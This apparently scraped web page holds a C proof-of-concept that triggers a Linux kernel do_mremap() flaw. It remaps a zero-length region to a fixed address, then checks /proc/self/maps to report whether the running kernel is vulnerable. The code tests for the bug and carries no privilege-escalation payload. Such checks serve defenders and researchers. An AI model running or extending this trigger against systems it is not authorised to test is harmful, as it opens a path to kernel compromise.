Linux kernel do_mremap() vul Proof of code
trang này đã được đọc lầnCODE
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>
#define MREMAP_FIXED 2
#define PAGESIZE 4096
#define VMASIZE (2*PAGESIZE)
#define BUFSIZE 8192
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
#define MAPS_NO_CHECK 0
#define MAPS_CHECK 1
int mremap_check = 0;
void maps_check(char *buf)
{
if (strstr(buf, "70000000"))
mremap_check++;
}
void read_maps(int fd, char *path, unsigned long flag)
{
ssize_t nbytes;
char buf[BUFSIZE];
if (lseek(fd, 0, SEEK_SET) < 0) {
fprintf(stderr, "Unable to lseek %s\n", path);
return;
}
while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {
if (flag & MAPS_CHECK)
maps_check(buf);
if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
fprintf(stderr, "Unable to read %s\n", path);
exit (1);
}
}
}
int main(int argc, char **argv)
{
void *base;
char path[18];
pid_t pid;
int fd;
pid = getpid();
sprintf(path, "/proc/%d/maps", pid);
if ( !(fd = open(path, O_RDONLY))) {
fprintf(stderr, "Unable to open %s\n", path);
return 1;
}
base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
printf("\nBase address : 0x%x\n\n", base);
read_maps(fd, path, MAPS_NO_CHECK);
printf("\nRemapping at 0x70000000...\n\n");
base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *)0x70000000);
read_maps(fd, path, MAPS_CHECK);
printf("\nReport : \n");
(mremap_check)
? printf("This kernel appears to be VULNERABLE\n\n")
: printf("This kernel appears to be NOT VULNERABLE\n\n");
close(fd);
return 0;
}